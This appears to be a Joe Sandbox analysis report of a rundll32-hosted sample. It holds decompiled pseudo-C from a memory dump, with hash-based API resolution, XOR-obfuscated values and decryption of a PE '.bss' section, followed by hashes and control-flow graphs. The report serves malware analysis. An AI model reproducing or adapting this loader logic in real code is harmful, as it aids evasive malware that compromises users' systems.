                          				 *((intOrPtr*)(_t175 + 0x90)) = 0;
                          				goto 0xd9333234;
                          				 *((intOrPtr*)(_t175 + 0x90)) = r12d;
                          				E0000021D21DD933908C(0x3fe3c8ba, _t130,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t130 == _t134) goto 0xd933325f;
                          				r9d = 0;
                          				r8d = 0;
                          				 *((intOrPtr*)(_t175 + 0x20)) = 0;
                          				 *_t130(); // executed
                          				goto 0xd9333262;
                          				_t131 = _t134;
                          				 *((long long*)(_t165 + 0x28)) = _t131;
                          				HeapFree(_t191, _t188, _t164);
                          				if ( *((intOrPtr*)(_t165 + 0x28)) == _t134) goto 0xd9333469;
                          				if ( *((intOrPtr*)(_t175 + 0xa0)) == 0) goto 0xd93332be;
                          				E0000021D21DD933908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t131 == _t134) goto 0xd93332b4;
                          				_t18 = _t175 + 0xa0; // -14
                          				r9d = r12d;
                          				 *_t131();
                          				goto 0xd93332b6;
                          				if (0 == 0) goto 0xd9333469;
                          				E0000021D21DD9336C34(_t134,  *((intOrPtr*)(_t165 + 8)), _t165, _t168, _t130, _t18, _t167, _t170);
                          				if (_t131 == _t134) goto 0xd9333469;
                          				 *((intOrPtr*)(_t175 + 0x90)) = 0x100;
                          				if ( *((intOrPtr*)(_t175 + 0xb0)) == 0) goto 0xd9333326;
                          				 *((intOrPtr*)(_t175 + 0x40)) = 0xaa0;
                          				E0000021D21DD933908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t131 == _t134) goto 0xd9333316;
                          				r9d = 4;
                          				 *_t131();
                          				asm("bts dword [esp+0x90], 0x17");
                          				goto 0xd933332b;
                          				E0000021D21DD933908C(0x7dda0345, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t131 == _t134) goto 0xd9333350;
                          				r9d = 0;
                          				r8d = 0x50;
                          				 *_t131();
                          				goto 0xd9333353;
                          				_t132 = _t134;
                          				 *((long long*)(_t165 + 0x30)) = _t132;
                          				HeapFree(??, ??, ??);
                          				if ( *((intOrPtr*)(_t165 + 0x30)) == _t134) goto 0xd9333469;
                          				E0000021D21DD9336C34(_t134,  *((intOrPtr*)(_t165 + 0x10)), _t165, _t168, _t130, _t131);
                          				_t172 = _t132;
                          				if (_t132 == _t134) goto 0xd9333469;
                          				E0000021D21DD933908C(0xaa9d9fc1, _t132,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t132 == _t134) goto 0xd93333de;
                          				_t163 =  !=  ?  *0xd933d448 + 0x21dd9341250 :  *0xd933d448 + 0x21dd9341268;
                          				r9d = 0;
                          				 *((intOrPtr*)(_t175 + 0x30)) =  *((intOrPtr*)(_t175 + 0x90));
                          				 *((long long*)(_t175 + 0x28)) = _t134;
                          				 *((long long*)(_t175 + 0x20)) = _t134;
                          				 *_t132(); // executed
                          				goto 0xd93333e1;
                          				_t133 = _t134;
                          				 *((long long*)(_t165 + 0x38)) = _t133;
                          				HeapFree(??, ??, ??);
                          				if ( *((intOrPtr*)(_t165 + 0x38)) == _t134) goto 0xd9333469;
                          				 *((intOrPtr*)(_t175 + 0x44)) = 4;
                          				E0000021D21DD933908C(0x677ec78c, _t133,  *((intOrPtr*)(_t168 + 0x48)));
                          				_t48 = _t172 + 0x1b; // 0x1f
                          				r12d = _t48;
                          				if (_t133 == _t134) goto 0xd9333431;
                          				 *_t133();
                          				goto 0xd9333433;
                          				if (0 == 0) goto 0xd9333487;
                          				asm("bts dword [esp+0x90], 0x8");
                          				E0000021D21DD933908C(0xe7f09937, _t133,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t133 == _t134) goto 0xd9333487;
                          				r9d = 4;
                          				 *_t133();
                          				goto 0xd9333487;
                          				E0000021D21DD933908C(0xc06f8334, _t133,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t133 == _t134) goto 0xd9333482;
                          				 *_t133();
                          				goto 0xd9333487;
                          				return 0x7f;
                          			}

























                          0x21dd93331c0
                          0x21dd93331c0
                          0x21dd93331c5
                          0x21dd93331ca
                          0x21dd93331da
                          0x21dd93331e5
                          0x21dd93331f3
                          0x21dd93331f6
                          0x21dd93331fe
                          0x21dd933320b
                          0x21dd9333211
                          0x21dd9333215
                          0x21dd9333215
                          0x21dd9333219
                          0x21dd933321b
                          0x21dd9333221
                          0x21dd9333223
                          0x21dd933322a
                          0x21dd933322c
                          0x21dd933323d
                          0x21dd9333245
                          0x21dd933324e
                          0x21dd9333251
                          0x21dd9333257
                          0x21dd933325b
                          0x21dd933325d
                          0x21dd933325f
                          0x21dd933326a
                          0x21dd933326e
                          0x21dd9333278
                          0x21dd933328a
                          0x21dd9333292
                          0x21dd933329a
                          0x21dd93332a0
                          0x21dd93332a8
                          0x21dd93332b0
                          0x21dd93332b2
                          0x21dd93332b8
                          0x21dd93332c4
                          0x21dd93332cf
                          0x21dd93332d5
                          0x21dd93332e7
                          0x21dd93332ef
                          0x21dd93332f7
                          0x21dd93332ff
                          0x21dd9333305
                          0x21dd9333314
                          0x21dd9333316
                          0x21dd9333324
                          0x21dd9333334
                          0x21dd933333c
                          0x21dd9333342
                          0x21dd9333345
                          0x21dd933334c
                          0x21dd933334e
                          0x21dd9333350
                          0x21dd933335b
                          0x21dd933335f
                          0x21dd9333369
                          0x21dd9333375
                          0x21dd933337a
                          0x21dd9333380
                          0x21dd933338f
                          0x21dd9333397
                          0x21dd93333ba
                          0x21dd93333c5
                          0x21dd93333c8
                          0x21dd93333d0
                          0x21dd93333d5
                          0x21dd93333da
                          0x21dd93333dc
                          0x21dd93333de
                          0x21dd93333e9
                          0x21dd93333ed
                          0x21dd93333f7
                          0x21dd9333403
                          0x21dd933340b
                          0x21dd9333410
                          0x21dd9333410
                          0x21dd9333417
                          0x21dd933342d
                          0x21dd933342f
                          0x21dd9333435
                          0x21dd9333437
                          0x21dd9333449
                          0x21dd9333451
                          0x21dd933345f
                          0x21dd9333465
                          0x21dd9333467
                          0x21dd9333472
                          0x21dd933347a
                          0x21dd933347c
                          0x21dd9333480
                          0x21dd93334a0

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID:
                          • API String ID: 3901518246-0
                          • Opcode ID: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                          • Instruction ID: ad8ae7d7f31436cb9f7088730acbdbd08d59a0fc9f00488e348625d670cb54c8
                          • Opcode Fuzzy Hash: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                          • Instruction Fuzzy Hash: AD819C33344680D6EB28DFA6F5483DA62A1F7D8784F88A4259F4E47B79CF3AD4548700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: File$CreateDirectoryErrorLastQuery
                          • String ID:
                          • API String ID: 2967190759-0
                          • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction ID: 170d0d1596078f429ffcc5c9ab9403052743d64ffa5cf380aaa740f5e9065a54
                          • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction Fuzzy Hash: 34418933748780D6EB689F52B48839A72A0F7EC790F185525EE9D83B99CF3AD845C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0000021D21DD9339D6C(void* __ebx, void* __edx, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11, void* _a8, signed int _a16, char _a24, char _a32) {
                          				void* _v48;
                          				intOrPtr _v56;
                          				intOrPtr _v64;
                          				signed long long _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v96;
                          				signed long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t81;
                          				void* _t90;
                          				long long _t155;
                          				signed long long _t156;
                          				long long _t159;
                          				long long* _t163;
                          				long long _t196;
                          				long long _t198;
                          				long long _t200;
                          				void* _t203;
                          				long long _t205;
                          				signed int* _t212;
                          				void* _t230;
                          				void* _t232;
                          				void* _t234;
                          
                          				_t231 = __r11;
                          				_t230 = __r10;
                          				_t155 = _t205;
                          				 *((long long*)(_t155 + 8)) = __rbx;
                          				r12d =  *0xd933d450;
                          				 *(_t155 + 0x20) =  *(_t155 + 0x20) & 0x00000000;
                          				_t159 = __rcx;
                          				_t163 = _t155 - 0x40;
                          				if (E0000021D21DD93388C8(__rcx, _t163, _t196, _t198, _t203, _t234, _t232) != 0) goto 0xd933a08e;
                          				r9d = ( *(_t159 + 0x40))[1] & 0x0000ffff;
                          				if (_t163 - __r9 + 8 <= 0) goto 0xd9339ddc;
                          				if ((r12d ^ 0xe49a1e6d) == 0) goto 0xd9339dde;
                          				E0000021D21DD9334D70(r12d ^ 0xe49a1e6d, __r9 +  &(( *(_t159 + 0x40))[4]));
                          				_t200 = _t155;
                          				goto 0xd9339dde;
                          				if (_t200 == 0) goto 0xd933a084;
                          				_t13 = _t159 + 0xc0; // 0xc0
                          				_v96 = _t200;
                          				_v104 = _v104 & 0x00000000;
                          				if (E0000021D21DD93384E8(_t200, _t155, _t159, _t13, _v64, _t200, _t203,  *((intOrPtr*)(_t159 + 0x30)),  *((intOrPtr*)(_t159 + 0x38)), _t196, _t198) != 0) goto 0xd933a084;
                          				_t156 =  *((intOrPtr*)(_t159 + 0x28));
                          				_v72 = _t156;
                          				if (E0000021D21DD93391C8( *( *(_t159 + 0x40)) & 0x0000ffff, r12d ^ 0x61f25585, _t156, _t159, _t200, _v64, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0xd9339e60;
                          				_t212 =  &_a16;
                          				if (E0000021D21DD933672C(_v80, _v64, _t212) == 0) goto 0xd9339e60;
                          				goto 0xd9339e69;
                          				_a16 = 0;
                          				E0000021D21DD933908C(0xab05e147, _t156,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t156 == 0) goto 0xd9339e97;
                          				r8d = 0;
                          				_t27 = _t212 + 1; // 0x1
                          				r9d = 0;
                          				 *_t156();
                          				goto 0xd9339e9c;
                          				if (0x7f != 0x102) goto 0xd933a084;
                          				 *(_t159 + 0x64) = 0x3e8;
                          				if (E0000021D21DD93391C8(_t27, r12d ^ 0x64d094d6, _t156, _t159, _t200,  &_v72, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0xd9339eee;
                          				_v104 = _v104 & 0x00000000;
                          				r9d = 0;
                          				E0000021D21DD93314B8(_t156, _t159, _t159, 0x21dd93334a4, _t200, _v80,  &_a24);
                          				if (E0000021D21DD93391C8(_t27, r12d ^ 0xdd4632ba, _t156, _t159, _t200, 0x21dd93334a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0xd9339f3c;
                          				if (E0000021D21DD933672C(_v80, 0x21dd93334a4,  &_a16) == 0) goto 0xd9339f3c;
                          				_t81 = _a16;
                          				if (_t81 == 0) goto 0xd9339f3c;
                          				 *(_t159 + 0x64) = _t81 * 0x3e8;
                          				if (E0000021D21DD93391C8(_t27, r12d ^ 0x705ce798, _t156, _t159, _t200, 0x21dd93334a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0xd9339f7f;
                          				if (E0000021D21DD933672C(_v80, 0x21dd93334a4,  &_a16) == 0) goto 0xd9339f7f;
                          				goto 0xd9339f88;
                          				_a16 = 0;
                          				r12d = r12d ^ 0xe5c7ba87;
                          				if (E0000021D21DD93391C8(_t27, r12d, _t156, _t159, _t200, 0x21dd93334a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0xd9339ffa;
                          				if (E0000021D21DD933672C(_v80, 0x21dd93334a4,  &_a32) == 0) goto 0xd9339ffa;
                          				E0000021D21DD933908C(0x9c66d81c, _t156,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t156 == 0) goto 0xd9339fdd;
                          				 *_t156();
                          				 *((intOrPtr*)(_t159 + 0x60)) = _a32;
                          				 *((long long*)(_t159 + 0x58)) = _t156 * 0x23c34600 + _v56;
                          				_t90 = E0000021D21DD9332DC4(_t159,  &_v48,  &_v88); // executed
                          				if (_t90 != 0) goto 0xd933a022;
                          				r8d = _v88;
                          				E0000021D21DD9337258(0, _t159, _t159, _v48, _t230);
                          				E0000021D21DD933908C(0xab05e147, _t156,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t156 == 0) goto 0xd933a051;
                          				r8d = 0;
                          				r9d = 0;
                          				r9d = r9d * 0x3e8;
                          				 *_t156();
                          				goto 0xd933a056;
                          				if (0x7f != 0) goto 0xd9339ffa;
                          				if ( *((intOrPtr*)(_t159 + 0x50)) == 0) goto 0xd933a084;
                          				E0000021D21DD9332874( *((intOrPtr*)( *0xd933d458 + 8)),  *((intOrPtr*)(_t159 + 0x50)), _t196,  *((intOrPtr*)(_t159 + 0x50)));
                          				HeapFree(_t203, ??);
                          				0xd933a568();
                          				asm("lock inc ecx");
                          				return 0x7f;
                          			}





























                          0x21dd9339d6c
                          0x21dd9339d6c
                          0x21dd9339d6c
                          0x21dd9339d6f
                          0x21dd9339d85
                          0x21dd9339d8c
                          0x21dd9339d90
                          0x21dd9339d93
                          0x21dd9339da0
                          0x21dd9339dad
                          0x21dd9339dc2
                          0x21dd9339dcb
                          0x21dd9339dd2
                          0x21dd9339dd7
                          0x21dd9339dda
                          0x21dd9339de1
                          0x21dd9339df4
                          0x21dd9339dfb
                          0x21dd9339e00
                          0x21dd9339e0e
                          0x21dd9339e14
                          0x21dd9339e31
                          0x21dd9339e3d
                          0x21dd9339e44
                          0x21dd9339e55
                          0x21dd9339e5e
                          0x21dd9339e62
                          0x21dd9339e72
                          0x21dd9339e7a
                          0x21dd9339e7c
                          0x21dd9339e8a
                          0x21dd9339e8e
                          0x21dd9339e91
                          0x21dd9339e95
                          0x21dd9339ea2
                          0x21dd9339ec1
                          0x21dd9339ecf
                          0x21dd9339ed6
                          0x21dd9339ee3
                          0x21dd9339ee9
                          0x21dd9339f0e
                          0x21dd9339f26
                          0x21dd9339f28
                          0x21dd9339f31
                          0x21dd9339f39
                          0x21dd9339f5c
                          0x21dd9339f74
                          0x21dd9339f7d
                          0x21dd9339f81
                          0x21dd9339f88
                          0x21dd9339fa9
                          0x21dd9339fc1
                          0x21dd9339fcc
                          0x21dd9339fd4
                          0x21dd9339fdb
                          0x21dd9339fe7
                          0x21dd9339ff6
                          0x21dd933a007
                          0x21dd933a00e
                          0x21dd933a010
                          0x21dd933a01d
                          0x21dd933a02b
                          0x21dd933a033
                          0x21dd933a035
                          0x21dd933a038
                          0x21dd933a044
                          0x21dd933a04b
                          0x21dd933a04f
                          0x21dd933a058
                          0x21dd933a061
                          0x21dd933a071
                          0x21dd933a07e
                          0x21dd933a089
                          0x21dd933a08e
                          0x21dd933a0a9

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Alloc$Free
                          • String ID:
                          • API String ID: 1549400367-0
                          • Opcode ID: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                          • Instruction ID: 1f22795ba45d52a88089eb2b3a3f42c271edcff7be1d11339aa20f809238f2be
                          • Opcode Fuzzy Hash: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                          • Instruction Fuzzy Hash: D391C133244685C2EB68DF22F4493DAA7A5E7E5B84F446012EE4E47BADDF3AC446C740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 220 21dd9331bfc-21dd9331c41 221 21dd9331c43-21dd9331c45 call 21dd93347b8 220->221 222 21dd9331c4a-21dd9331c5b call 21dd933908c 220->222 221->222 226 21dd9331c5d 222->226 227 21dd9331c63-21dd9331c6d 222->227 226->227 228 21dd9331c6f-21dd9331c80 227->228 229 21dd9331cdd-21dd9331ce4 227->229 230 21dd9331c94 228->230 231 21dd9331c82-21dd9331c85 228->231 232 21dd9331ceb-21dd9331cfc call 21dd933908c 229->232 235 21dd9331c97-21dd9331c9a 230->235 233 21dd9331c90-21dd9331c92 231->233 234 21dd9331c87-21dd9331c8e 231->234 240 21dd9331cfe-21dd9331d03 232->240 241 21dd9331d09-21dd9331d0c 232->241 233->230 233->235 234->231 234->233 238 21dd9331caf-21dd9331cc1 call 21dd933240c 235->238 239 21dd9331c9c-21dd9331ca0 235->239 238->229 250 21dd9331cc3-21dd9331cdb 238->250 239->238 242 21dd9331ca2-21dd9331ca6 239->242 240->241 244 21dd9331d12-21dd9331d49 call 21dd9335168 241->244 245 21dd9331ed1 241->245 242->238 246 21dd9331ca8-21dd9331cac 242->246 252 21dd9331d4f-21dd9331d6f call 21dd933908c 244->252 253 21dd9331ec1-21dd9331ecf HeapFree 244->253 248 21dd9331ed6-21dd9331eef 245->248 246->238 250->232 256 21dd9331d71 252->256 257 21dd9331d77-21dd9331d7e 252->257 253->248 256->257 258 21dd9331d80-21dd9331d8a call 21dd933240c 257->258 259 21dd9331d8c 257->259 260 21dd9331d94-21dd9331da5 call 21dd933908c 258->260 259->260 265 21dd9331dad-21dd9331db0 260->265 266 21dd9331da7 260->266 267 21dd9331ea1-21dd9331ebb HeapFree * 2 265->267 268 21dd9331db6-21dd9331dc9 call 21dd933908c 265->268 266->265 267->253 271 21dd9331dd5 268->271 272 21dd9331dcb-21dd9331dd3 268->272 273 21dd9331dd8-21dd9331deb call 21dd933908c 271->273 272->273 277 21dd9331ded-21dd9331df5 273->277 278 21dd9331df7 273->278 279 21dd9331dfa-21dd9331e0d call 21dd933240c 277->279 278->279 283 21dd9331e93-21dd9331e9b HeapFree 279->283 284 21dd9331e13-21dd9331e70 call 21dd93347b0 call 21dd9336518 279->284 283->267 288 21dd9331e75-21dd9331e7c 284->288 289 21dd9331e7e-21dd9331e83 288->289 290 21dd9331e85-21dd9331e8d HeapFree 288->290 289->290 290->283
                          C-Code - Quality: 17%
                          			E0000021D21DD9331BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                          				long long _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v96;
                          				char _v104;
                          				signed int _v112;
                          				long long _v120;
                          				long long _v128;
                          				intOrPtr _v136;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t65;
                          				void* _t70;
                          				void* _t82;
                          				intOrPtr _t93;
                          				intOrPtr _t94;
                          				long long* _t148;
                          				long long* _t152;
                          				long long* _t155;
                          				long long* _t157;
                          				intOrPtr* _t188;
                          				intOrPtr _t189;
                          				long long _t192;
                          				long long* _t193;
                          				void* _t203;
                          				intOrPtr _t213;
                          				long long _t214;
                          
                          				_t157 = __rbx;
                          				_t148 = __rax;
                          				_a24 = __rbx;
                          				_a16 = __rdx;
                          				_t214 =  *0xd933d458;
                          				_t192 =  *((intOrPtr*)(__rcx));
                          				r13d = r8d;
                          				_t193 = __rcx;
                          				_v72 = _t214;
                          				_v96 = _t192;
                          				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0xd9331c4a;
                          				E0000021D21DD93347B8(0, __rax, __rbx, __rcx, __rdx);
                          				E0000021D21DD933908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
                          				if (_t148 == _t157) goto 0xd9331c63;
                          				_t9 = _t192 + 0x18; // 0x18
                          				 *_t148();
                          				_t65 =  *(_t193 + 0x50) & 0x000000ff;
                          				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0xd9331cdd;
                          				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
                          				_t93 =  *_t188;
                          				if (_t93 == 0) goto 0xd9331c94;
                          				if (_t93 == 0x2f) goto 0xd9331c90;
                          				_t94 =  *((intOrPtr*)(_t188 + 1));
                          				if (_t94 != 0) goto 0xd9331c82;
                          				if (_t94 != 0) goto 0xd9331c97;
                          				_t152 = _t157;
                          				if (_t152 == _t157) goto 0xd9331caf;
                          				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0xd9331caf;
                          				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0xd9331caf;
                          				E0000021D21DD933240C(0, _t157, _t9 + _t188, _t192, _t193);
                          				if (_t152 == _t157) goto 0xd9331cdd;
                          				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
                          				_a8 = 0;
                          				goto 0xd9331ceb;
                          				E0000021D21DD933908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
                          				if (_t152 == _t157) goto 0xd9331d09;
                          				 *_t152();
                          				if (_t152 == _t157) goto 0xd9331ed1;
                          				_t23 =  &_v104; // 0x2
                          				r9d = 0;
                          				r8d = r13d;
                          				_v112 = _t23;
                          				_t25 =  &_v88; // 0x12
                          				_t189 = _a16;
                          				_v120 = _t25;
                          				_t27 =  &_v80; // 0x1a
                          				_t155 = _t27;
                          				_v128 = _t155;
                          				_v136 = 0;
                          				_t70 = E0000021D21DD9335168(_t157, _t193, _t189, _t203); // executed
                          				if (_t70 != 0) goto 0xd9331ec1;
                          				_t213 =  *0xd933d458;
                          				E0000021D21DD933908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                          				if (_t155 == _t157) goto 0xd9331d77;
                          				 *_t155();
                          				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0xd9331d8c;
                          				E0000021D21DD933240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
                          				goto 0xd9331d94;
                          				E0000021D21DD933908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                          				if (_t155 == _t157) goto 0xd9331dad;
                          				 *_t155();
                          				if (_a8 == _t157) goto 0xd9331ea1;
                          				E0000021D21DD933908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
                          				if (_t155 == _t157) goto 0xd9331dd5;
                          				r14d =  *_t155();
                          				goto 0xd9331dd8;
                          				r14d = 0;
                          				E0000021D21DD933908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
                          				if (_t155 == _t157) goto 0xd9331df7;
                          				r13d =  *_t155();
                          				goto 0xd9331dfa;
                          				r13d = 0;
                          				_t40 = _t214 + 2; // 0x2
                          				E0000021D21DD933240C(_t213 + _t40, _t157, _t152, _t192, _a8);
                          				if (_t155 == _t157) goto 0xd9331e93;
                          				_t41 = _t213 + 1; // 0x1
                          				r8d = _t41;
                          				 *((char*)(_t189 + _t155)) = 0x2f;
                          				0xd93347b0();
                          				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
                          				_v120 = _a48;
                          				_v128 = _a40;
                          				_v136 = _v104;
                          				_t82 = E0000021D21DD9336518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88); // executed
                          				if (_t82 != 0x10d2) goto 0xd9331e85;
                          				asm("sbb eax, eax");
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				goto 0xd9331ed6;
                          				return 8;
                          			}































                          0x21dd9331bfc
                          0x21dd9331bfc
                          0x21dd9331bfc
                          0x21dd9331c01
                          0x21dd9331c15
                          0x21dd9331c1f
                          0x21dd9331c28
                          0x21dd9331c2e
                          0x21dd9331c31
                          0x21dd9331c36
                          0x21dd9331c41
                          0x21dd9331c45
                          0x21dd9331c53
                          0x21dd9331c5b
                          0x21dd9331c5d
                          0x21dd9331c61
                          0x21dd9331c67
                          0x21dd9331c6d
                          0x21dd9331c75
                          0x21dd9331c7c
                          0x21dd9331c80
                          0x21dd9331c85
                          0x21dd9331c8a
                          0x21dd9331c8e
                          0x21dd9331c92
                          0x21dd9331c94
                          0x21dd9331c9a
                          0x21dd9331ca0
                          0x21dd9331ca6
                          0x21dd9331cb6
                          0x21dd9331cc1
                          0x21dd9331cc8
                          0x21dd9331ccc
                          0x21dd9331cdb
                          0x21dd9331cf4
                          0x21dd9331cfc
                          0x21dd9331d07
                          0x21dd9331d0c
                          0x21dd9331d12
                          0x21dd9331d17
                          0x21dd9331d1a
                          0x21dd9331d1d
                          0x21dd9331d22
                          0x21dd9331d27
                          0x21dd9331d2a
                          0x21dd9331d2f
                          0x21dd9331d2f
                          0x21dd9331d37
                          0x21dd9331d3c
                          0x21dd9331d40
                          0x21dd9331d49
                          0x21dd9331d4f
                          0x21dd9331d67
                          0x21dd9331d6f
                          0x21dd9331d75
                          0x21dd9331d7e
                          0x21dd9331d82
                          0x21dd9331d8a
                          0x21dd9331d9d
                          0x21dd9331da5
                          0x21dd9331dab
                          0x21dd9331db0
                          0x21dd9331dc1
                          0x21dd9331dc9
                          0x21dd9331dd0
                          0x21dd9331dd3
                          0x21dd9331dd5
                          0x21dd9331de3
                          0x21dd9331deb
                          0x21dd9331df2
                          0x21dd9331df5
                          0x21dd9331df7
                          0x21dd9331dfa
                          0x21dd9331e02
                          0x21dd9331e0d
                          0x21dd9331e16
                          0x21dd9331e16
                          0x21dd9331e1f
                          0x21dd9331e26
                          0x21dd9331e52
                          0x21dd9331e5e
                          0x21dd9331e67
                          0x21dd9331e6c
                          0x21dd9331e70
                          0x21dd9331e7c
                          0x21dd9331e81
                          0x21dd9331e8d
                          0x21dd9331e9b
                          0x21dd9331eab
                          0x21dd9331ebb
                          0x21dd9331ec9
                          0x21dd9331ecf
                          0x21dd9331eef

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID: uJ$uJ
                          • API String ID: 2332451156-3171342107
                          • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction ID: f4dfa90a55bcc5e548cc8ce094aae3f2ea45101bfa7cc62b097c15f6ed310301
                          • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction Fuzzy Hash: 1A81B237744A80C6EB28DFA6F4582EE67E1F7DAB84F485421DE8E43769CE3AC4458700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 34%
                          			E0000021D21DD9334DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
                          				intOrPtr _t22;
                          				intOrPtr _t23;
                          				void* _t30;
                          				long long _t55;
                          				void* _t71;
                          				intOrPtr* _t74;
                          				intOrPtr* _t75;
                          				long long _t81;
                          				long long _t82;
                          				long long _t84;
                          				void* _t90;
                          				long _t92;
                          				long _t94;
                          				long _t96;
                          
                          				_t90 = __r9;
                          				_t55 = _t84;
                          				 *((long long*)(_t55 + 8)) = __rbx;
                          				 *((long long*)(_t55 + 0x10)) = _t81;
                          				 *((long long*)(_t55 + 0x18)) = __rsi;
                          				 *((long long*)(_t55 + 0x20)) = __rdi;
                          				_t82 = __rcx;
                          				r8d = 0;
                          				HeapCreate(_t96, _t94, _t92); // executed
                          				if (_t55 == 0) goto 0xd9334f03;
                          				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                          				_t74 = _t55 + _t71 + 0x68;
                          				_t22 =  *_t74;
                          				if (_t22 == 0) goto 0xd9334e94;
                          				if (_t22 == 0x7373622e) goto 0xd9334e22;
                          				_t75 = _t74 + 0x28;
                          				_t23 =  *_t75;
                          				if (_t23 != 0) goto 0xd9334e11;
                          				if (_t23 == 0) goto 0xd9334e94;
                          				r13d =  *(_t75 + 0x10);
                          				r12d =  *(_t75 + 0x14);
                          				r12d = r12d ^  *(_t71 + 8);
                          				r12d = r12d ^ r13d;
                          				HeapAlloc(??, ??, ??);
                          				if (_t55 == 0) goto 0xd9334e8d;
                          				r9d = r12d;
                          				r8d = r13d;
                          				E0000021D21DD933111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
                          				r11d =  *((intOrPtr*)(_t75 + 0xc));
                          				 *0xd933d448 = _t55 - __r11 - _t82;
                          				 *0xd933d450 = E0000021D21DD93316FC(_t55, _t55 - __r11 - _t82 + 0xd9341040);
                          				goto 0xd9334e99;
                          				goto 0xd9334e99;
                          				if (2 == 0) goto 0xd9334ea8;
                          				HeapDestroy(??);
                          				goto 0xd9334f03;
                          				HeapAlloc(??, ??, ??);
                          				if (0xd9341040 != 0) goto 0xd9334ee1;
                          				HeapDestroy(??);
                          				goto 0xd9334f03;
                          				0xd933487a();
